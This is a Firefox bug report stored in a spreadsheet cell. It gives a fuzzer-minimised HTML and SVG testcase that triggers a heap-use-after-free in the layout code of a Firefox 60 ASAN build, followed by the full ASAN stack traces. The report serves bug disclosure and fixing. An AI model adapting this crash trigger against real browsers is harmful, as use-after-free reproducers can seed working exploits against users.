      </c>
      <c r="W1825" t="inlineStr">
        <is>
          <t>Created attachment 8955997
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 60.0a1 (SourceStamp=21f7f94a2c18dc8010ac2f300a36cc4ddd16081c). It requires the attached test.svg in the same directory.
crash.html:
&lt;script&gt;
function start() {
	o7=document.createElement('div');
	o7.innerHTML='&lt;style&gt;@keyframes key7{ from{ transform: rotate(-536870911deg)}}\n*{ animation-name: key7; animation-duration: 0.001s';
	o17=document.createElement('div');
	o17.innerHTML='&lt;svg&gt;&lt;style&gt;@font-face{}\n*{ outline-style: dotted&lt;/style&gt;&lt;style&gt;@font-face{ font-family: font3; src: url(';
	o18=o17.firstChild.getElementsByTagName('*');
	o20=o18[0];
	o23=o18[1];
	o114=document.createElement('iframe');
	o114.src='test.svg';
	o114.addEventListener('load', fun0,false);
	document.body.appendChild(o114);
}
function fun0() {
	o117=o114.contentDocument;
	document.replaceChild(o117.documentElement,document.documentElement);
	o124=document.createElement('iframe');
	document.documentElement.appendChild(o124);
	o145=document.createElement('div');
	o145.innerHTML='&lt;svg&gt;&lt;set attributeName="text-decoration"&gt;';
	document.documentElement.appendChild(o20);
	document.documentElement.appendChild(o23);
	document.documentElement.appendChild(o7);
	o124.src='x';
	document.documentElement.appendChild(o145);
	o264=document.createElement('style');
	o265=document.createTextNode('*{ float: left');
	o264.appendChild(o265);
	o23.appendChild(o264);
	setTimeout("location.reload()",40);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
test.svg:
&lt;svg class='class2' xmlns='http://www.w3.org/2000/svg'&gt;
&lt;clipPath clipPathUnits='userSpaceOnUse' id='id9' lighting-color='pink' class='class0 class1' &gt;
&lt;/clipPath&gt;
&lt;a id='id0' clip-path='url(#id9)' &gt;
&lt;/a&gt;
&lt;/svg&gt;
ASAN output:
=================================================================
==5408==ERROR: AddressSanitizer: heap-use-after-free on address 0x6040000e7ebc at pc 0x7fdacf128a80 bp 0x7fff70c73a20 sp 0x7fff70c73a18
READ of size 1 at 0x6040000e7ebc thread T0 (file:// Content)
    #0 0x7fdacf128a7f in nsIFrame::GetClipPropClipRect(nsStyleDisplay const*, nsStyleEffects const*, nsSize const&amp;) const /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:2426:19
    #1 0x7fdacf133156 in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsDisplayList*, bool*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3013:7
    #2 0x7fdacf0596ed in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3755:12
    #3 0x7fdacf0eb3fd in nsContainerFrame::BuildDisplayListForNonBlockChildren(nsDisplayListBuilder*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:388:5
    #4 0x7fdacf05a27c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3815:14
    #5 0x7fdacf0eb3fd in nsContainerFrame::BuildDisplayListForNonBlockChildren(nsDisplayListBuilder*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:388:5
    #6 0x7fdacf513f93 in nsSVGOuterSVGFrame::BuildDisplayList(nsDisplayListBuilder*, nsDisplayListSet const&amp;) /builds/worker/workspace/build/src/layout/svg/nsSVGOuterSVGFrame.cpp:788:5
    #7 0x7fdacf133e19 in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsDisplayList*, bool*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3047:5
    #8 0x7fdacf0596ed in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3755:12
    #9 0x7fdacf0da52d in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsDisplayListSet const&amp;) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:568:5
    #10 0x7fdacf05a27c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3815:14
    #11 0x7fdacf1dd8ee in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsDisplayListSet const&amp;) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:3617:15
    #12 0x7fdacf05a27c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3815:14
    #13 0x7fdacf055c2f in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsDisplayListSet const&amp;) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:66:5
    #14 0x7fdacf133e19 in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsDisplayList*, bool*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3047:5
    #15 0x7fdacef75433 in nsLayoutUtils::GetFramesForArea(nsIFrame*, nsRect const&amp;, nsTArray&lt;nsIFrame*&gt;&amp;, unsigned int) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3330:11
    #16 0x7fdacef74afb in nsLayoutUtils::GetFrameForPoint(nsIFrame*, nsPoint, unsigned int) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3291:8
    #17 0x7fdacee1c1a3 in mozilla::FindFrameTargetedByInputEvent(mozilla::WidgetGUIEvent*, nsIFrame*, nsPoint const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/base/PositionedEventTargeting.cpp:548:5
    #18 0x7fdacee68d0c in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7191:11
    #19 0x7fdace5b2c1a in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/worker/workspace/build/src/view/nsViewManager.cpp:812:14
    #20 0x7fdace5b2302 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /builds/worker/workspace/build/src/view/nsView.cpp:1139:9
    #21 0x7fdace61584c in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&amp;) /builds/worker/workspace/build/src/widget/PuppetWidget.cpp:410:35
    #22 0x7fdac932ed5c in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&amp;) /builds/worker/workspace/build/src/gfx/layers/apz/util/APZCCallbackHelper.cpp:499:21
    #23 0x7fdacdf08847 in DispatchWidgetEventViaAPZ /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:1794:10
    #24 0x7fdacdf08847 in mozilla::dom::TabChild::HandleRealMouseButtonEvent(mozilla::WidgetMouseEvent const&amp;, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long const&amp;) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:1734
    #25 0x7fdacdf0984e in mozilla::dom::TabChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&amp;, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long const&amp;) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:1701:3
    #26 0x7fdacdf09a24 in RecvSynthMouseMoveEvent /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:1662:8
    #27 0x7fdacdf09a24 in non-virtual thunk to mozilla::dom::TabChild::RecvSynthMouseMoveEvent(mozilla::WidgetMouseEvent const&amp;, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long const&amp;) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp
    #28 0x7fdac81b2ab5 in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:3362:20
    #29 0x7fdac83b1604 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:5023:28
    #30 0x7fdac7ab5f3e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2133:25
    #31 0x7fdac7ab2fb7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2063:17
    #32 0x7fdac7ab46bc in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1909:5
    #33 0x7fdac7ab4d18 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1942:15
    #34 0x7fdac6bbc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #35 0x7fdac6be4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #36 0x7fdac6c00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #37 0x7fdac7abe05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #38 0x7fdac7a115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #39 0x7fdac7a115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #40 0x7fdac7a115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #41 0x7fdace63f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #42 0x7fdad2ad29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #43 0x7fdac7a115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #44 0x7fdac7a115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #45 0x7fdac7a115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #46 0x7fdad2ad23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34
    #47 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #48 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #49 0x7fdae611c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #50 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)
0x6040000e7ebc is located 44 bytes inside of 48-byte region [0x6040000e7e90,0x6040000e7ec0)
freed by thread T0 (file:// Content) here:
    #0 0x4c1952 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7fdad4a70510 in _$LT$servo_arc..Arc$LT$T$GT$$u20$as$u20$core..ops..drop..Drop$GT$::drop::h9d5951288e1541e5 /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:390
    #2 0x7fdad4a70510 in core::ptr::drop_in_place::h79927eef08a236c1 /checkout/src/libcore/ptr.rs:59
    #3 0x7fdad4a70510 in _$LT$servo_arc..RawOffsetArc$LT$T$GT$$u20$as$u20$core..ops..drop..Drop$GT$::drop::h8efc1cbf95802962 /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:796
    #4 0x7fdad4a70510 in core::ptr::drop_in_place::h544d4bbc90b52c9b /checkout/src/libcore/ptr.rs:59
    #5 0x7fdad4a70510 in core::ptr::drop_in_place::h7d2987951e4a2458 /checkout/src/libcore/ptr.rs:59
    #6 0x7fdad4a70510 in core::ptr::drop_in_place::h901136eb87f307ed /checkout/src/libcore/ptr.rs:59
    #7 0x7fdad4a70510 in core::ptr::drop_in_place::h1697b417c29b53e8 /checkout/src/libcore/ptr.rs:59
    #8 0x7fdad4a70510 in core::ptr::drop_in_place::h88fe9c96fb8c5fb6 /checkout/src/libcore/ptr.rs:59
    #9 0x7fdad4a70510 in core::ptr::drop_in_place::h962af92429c8852c /checkout/src/libcore/ptr.rs:59
    #10 0x7fdad4a70510 in _$LT$servo_arc..Arc$LT$T$GT$$GT$::drop_slow::h051a8ccf0a675b69 /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:256
    #11 0x7fdad4a74552 in _$LT$servo_arc..Arc$LT$T$GT$$u20$as$u20$core..ops..drop..Drop$GT$::drop::h27083b96d3340537 /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:390
    #12 0x7fdad4a74552 in core::ptr::drop_in_place::hbba63d62ce0b4882 /checkout/src/libcore/ptr.rs:59
    #13 0x7fdad4a74552 in style::gecko::arc_types::Servo_StyleContext_Release::_$u7b$$u7b$closure$u7d$$u7d$::haa79a1639c6d1f99 /builds/worker/workspace/build/src/servo/components/style/gecko/arc_types.rs:133
    #14 0x7fdad4a74552 in _$LT$servo_arc..ArcBorrow$LT$$u27$a$C$$u20$T$GT$$GT$::with_arc::h5bede05e74d34eef /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:939
    #15 0x7fdad4a74552 in Servo_StyleContext_Release /builds/worker/workspace/build/src/servo/components/style/gecko/arc_types.rs:132
    #16 0x7fdaceed3265 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ServoStyleContext.h:37:20
    #17 0x7fdaceed3265 in Release /builds/worker/workspace/build/src/layout/style/nsStyleContextInlines.h:54
    #18 0x7fdaceed3265 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:41
    #19 0x7fdaceed3265 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:398
    #20 0x7fdaceed3265 in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:66
    #21 0x7fdaceed3265 in assign_with_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:57
    #22 0x7fdaceed3265 in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:193
    #23 0x7fdaceed3265 in SetStyleContextWithoutNotification /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:821
    #24 0x7fdaceed3265 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2526
    #25 0x7fdaceef7afb in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, nsCSSFrameConstructor::InsertionKind, TreeMatchContext*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8064:9
    #26 0x7fdaceef15cd in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, nsCSSFrameConstructor::InsertionKind) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9857:9
    #27 0x7fdacee1196d in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&amp;) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1658:25
    #28 0x7fdacee8d4a5 in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1188:9
    #29 0x7fdacee46836 in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1264:3
    #30 0x7fdacee46836 in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:46
    #31 0x7fdacee46836 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4211
    #32 0x7fdac9e43b05 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:572:5
    #33 0x7fdac9e43b05 in nsDocument::FlushPendingNotifications(mozilla::FlushType, mozilla::FlushTarget) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7602
    #34 0x7fdace036903 in nsSMILAnimationController::DoSample(bool) /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.cpp:440:15
    #35 0x7fdacdb8aecb in Resample /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:74:21
    #36 0x7fdacdb8aecb in FlushResampleRequests /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:90
    #37 0x7fdacdb8aecb in FlushAnimations /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:2726
    #38 0x7fdacdb8aecb in nsSVGEnum::DOMAnimatedEnum::AnimVal() /builds/worker/workspace/build/src/dom/svg/nsSVGEnum.h:97
    #39 0x7fdacf5241f3 in nsSVGUtils::GetBBox(nsIFrame*, unsigned int, mozilla::gfx::BaseMatrix&lt;double&gt; const*) /builds/worker/workspace/build/src/layout/svg/nsSVGUtils.cpp:1187:20
    #40 0x7fdacf131a1c in ComputeClipForMaskItem /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:2686:22
    #41 0x7fdacf131a1c in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsDisplayList*, bool*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:2997
    #42 0x7fdacf0596ed in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3755:12
    #43 0x7fdacf0eb3fd in nsContainerFrame::BuildDisplayListForNonBlockChildren(nsDisplayListBuilder*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:388:5
    #44 0x7fdacf05a27c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3815:14
    #45 0x7fdacf0eb3fd in nsContainerFrame::BuildDisplayListForNonBlockChildren(nsDisplayListBuilder*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:388:5
    #46 0x7fdacf513f93 in nsSVGOuterSVGFrame::BuildDisplayList(nsDisplayListBuilder*, nsDisplayListSet const&amp;) /builds/worker/workspace/build/src/layout/svg/nsSVGOuterSVGFrame.cpp:788:5
    #47 0x7fdacf133e19 in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsDisplayList*, bool*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3047:5
    #48 0x7fdacf0596ed in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3755:12
    #49 0x7fdacf0da52d in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsDisplayListSet const&amp;) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:568:5
    #50 0x7fdacf05a27c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3815:14
    #51 0x7fdacf1dd8ee in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsDisplayListSet const&amp;) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:3617:15
    #52 0x7fdacf05a27c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsDisplayListSet const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3815:14
    #53 0x7fdacf055c2f in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsDisplayListSet const&amp;) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:66:5
    #54 0x7fdacf133e19 in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsDisplayList*, bool*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:3047:5
    #55 0x7fdacef75433 in nsLayoutUtils::GetFramesForArea(nsIFrame*, nsRect const&amp;, nsTArray&lt;nsIFrame*&gt;&amp;, unsigned int) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3330:11
    #56 0x7fdacef74afb in nsLayoutUtils::GetFrameForPoint(nsIFrame*, nsPoint, unsigned int) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3291:8
    #57 0x7fdacee1c1a3 in mozilla::FindFrameTargetedByInputEvent(mozilla::WidgetGUIEvent*, nsIFrame*, nsPoint const&amp;, unsigned int) /builds/worker/workspace/build/src/layout/base/PositionedEventTargeting.cpp:548:5
previously allocated by thread T0 (file:// Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fdad4a79db2 in alloc_system::platform::_$LT$impl$u20$alloc..allocator..Alloc$u20$for$u20$$RF$$u27$a$u20$alloc_system..System$GT$::alloc::h8cd93390057ad93d /checkout/src/liballoc_system/lib.rs:135
    #2 0x7fdad4a79db2 in _$LT$alloc_system..System$u20$as$u20$alloc..allocator..Alloc$GT$::alloc::haa725be1f48230e6 /checkout/src/liballoc_system/lib.rs:57
    #3 0x7fdad4a79db2 in __rdl_alloc /checkout/src/libstd/heap.rs:37
    #4 0x7fdad4a79db2 in _$LT$alloc..heap..Heap$u20$as$u20$alloc..allocator..Alloc$GT$::alloc::h05b55476c9a26516 /checkout/src/liballoc/heap.rs:84
    #5 0x7fdad4a79db2 in alloc::heap::exchange_malloc::h72e689b70b59f4d6 /checkout/src/liballoc/heap.rs:249
    #6 0x7fdad4a79db2 in _$LT$alloc..boxed..Box$LT$T$GT$$GT$::new::ha611249e2e31b711 /checkout/src/liballoc/boxed.rs:242
    #7 0x7fdad4a79db2 in _$LT$servo_arc..Arc$LT$T$GT$$GT$::new::h751c71290f83200a /builds/worker/workspace/build/src/servo/components/servo_arc/lib.rs:185
    #8 0x7fdad4a79db2 in style::gecko_properties::_$LT$impl$u20$style..gecko_bindings..structs..root..mozilla..GeckoEffects$GT$::default::h45253e246a1803b9 /builds/worker/workspace/build/src/obj-firefox/toolkit/library/x86_64-unknown-linux-gnu/release/build/style-6201c7cf09cdb4fe/out/gecko_properties.rs:23318
    #9 0x7fdad4a79db2 in style::gecko_properties::ComputedValues::default_values::h79759018a37c1c59 /builds/worker/workspace/build/src/obj-firefox/toolkit/library/x86_64-unknown-linux-gnu/release/build/style-6201c7cf09cdb4fe/out/gecko_properties.rs:269
    #10 0x7fdad49e66e9 in style::gecko::media_queries::Device::reset_computed_values::hc53a9fc1b6719b31 /builds/worker/workspace/build/src/servo/components/style/gecko/media_queries.rs:145
    #11 0x7fdad49e66e9 in style::gecko::media_queries::Device::rebuild_cached_data::h8f194ecbe0a2ebdf /builds/worker/workspace/build/src/servo/components/style/gecko/media_queries.rs:150
    #12 0x7fdad49e66e9 in Servo_StyleSet_RebuildCachedData /builds/worker/workspace/build/src/servo/ports/geckolib/glue.rs:2600
    #13 0x7fdacee8803a in mozilla::ServoRestyleManager::PostRebuildAllStyleDataEvent(nsChangeHint, nsRestyleHint) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:424:15
    #14 0x7fdac9e71a15 in nsIDocument::FlushUserFontSet() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:12656:22
    #15 0x7fdacee4653a in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4187:18
    #16 0x7fdac9e43b05 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:572:5
    #17 0x7fdac9e43b05 in nsDocument::FlushPendingNotifications(mozilla::FlushType, mozilla::FlushTarget) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7602
    #18 0x7fdac9e439eb in nsDocument::FlushPendingNotifications(mozilla::FlushType, mozilla::FlushTarget) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7597:22
    #19 0x7fdac8b46b47 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:700:14
    #20 0x7fdac8b48f7c in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:632:5
    #21 0x7fdac8b49f9c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #22 0x7fdac6daee0a in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #23 0x7fdac6dab4df in mozilla::net::nsLoadGroup::Cancel(nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:258:15
    #24 0x7fdac8b46669 in nsDocLoader::Stop() /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:246:22
    #25 0x7fdad1fcc6f9 in Stop /builds/worker/workspace/build/src/docshell/base/nsDocShell.h:202:25
    #26 0x7fdad1fcc6f9 in nsDocShell::Stop(unsigned int) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5208
    #27 0x7fdad1ff1c03 in nsDocShell::InternalLoad(nsIURI*, nsIURI*, mozilla::Maybe&lt;nsCOMPtr&lt;nsIURI&gt; &gt; const&amp;, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsTSubstring&lt;char16_t&gt; const&amp;, char const*, nsTSubstring&lt;char16_t&gt; const&amp;, nsIInputStream*, long, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsTSubstring&lt;char16_t&gt; const&amp;, nsIDocShell*, nsIURI*, nsIDocShell**, nsIRequest**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #28 0x7fdad1fe8615 in nsDocShell::LoadURI(nsIURI*, nsIDocShellLoadInfo*, unsigned int, bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1017:10
    #29 0x7fdac9ed3e76 in nsFrameLoader::ReallyStartLoadingInternal() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:597:19
    #30 0x7fdac9ed2a4b in nsFrameLoader::ReallyStartLoading() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:474:17
    #31 0x7fdac9e29cb9 in nsDocument::MaybeInitializeFinalizeFrameLoaders() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:6696:13
    #32 0x7fdac9e2956b in nsDocument::EndUpdate(unsigned int) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5151:3
    #33 0x7fdacce2af6c in nsHTMLDocument::EndUpdate(unsigned int) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2265:15
    #34 0x7fdac9c1e011 in ~mozAutoDocUpdate /builds/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:18
    #35 0x7fdac9c1e011 in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring&lt;char16_t&gt; const&amp;, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2588
    #36 0x7fdacbf2a937 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:895:12
    #37 0x7fdacbf2a937 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:1648
    #38 0x7fdacbf2a937 in SetHTMLAttr /builds/worker/workspace/build/src/dom/html/nsGenericHTMLElement.h:795
    #39 0x7fdacbf2a937 in SetSrc /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/HTMLIFrameElement.h:56
    #40 0x7fdacbf2a937 in mozilla::dom::HTMLIFrameElementBinding::set_src(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLIFrameElement*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLIFrameElementBinding.cpp:86
    #41 0x7fdacc2fa513 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2992:8
    #42 0x7fdad2d94598 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
    #43 0x7fdad2d94598 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #44 0x7fdad2d96d26 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:516:12
